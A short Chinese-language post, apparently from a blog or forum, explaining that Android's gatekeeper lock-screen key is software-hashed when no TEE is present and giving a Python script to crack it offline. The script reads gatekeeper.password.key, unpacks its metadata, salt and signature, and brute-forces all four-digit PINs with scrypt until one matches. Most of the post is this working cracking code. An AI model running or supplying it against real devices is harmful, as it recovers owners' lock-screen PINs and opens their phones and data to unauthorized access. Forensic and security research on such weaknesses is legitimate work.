gatekeeper.password.key离线破解算法
安卓很早就开始启用了gatekeeper的锁屏密码机制,如果未启用TEE的情况下,是默认使用“软加密”的方式,可以离线破解出原始密码,知道原始密码在某些情况下还是比较有用的,以下是破解实例,自行调整。
import struct import binascii import scrypt N = 16384; r = 8; p = 1; f = open('gatekeeper.password.key', 'rb') blob = f.read() s = struct.Struct('<'+'17s 8s 32s') (meta, salt, signature) = s.unpack_from(blob) for one in "0123456789": for two in "0123456789": for three in "0123456789": for four in "0123456789": password = one + two + three + four; print 'pass: %s' % password to_hash = meta to_hash += password hash = scrypt.hash(to_hash, salt, N, r, p) print 'signature %s' % signature.encode('hex') print 'Hash: %s' % hash[0:32].encode('hex') if hash[0:32] == signature: print "OK" exit()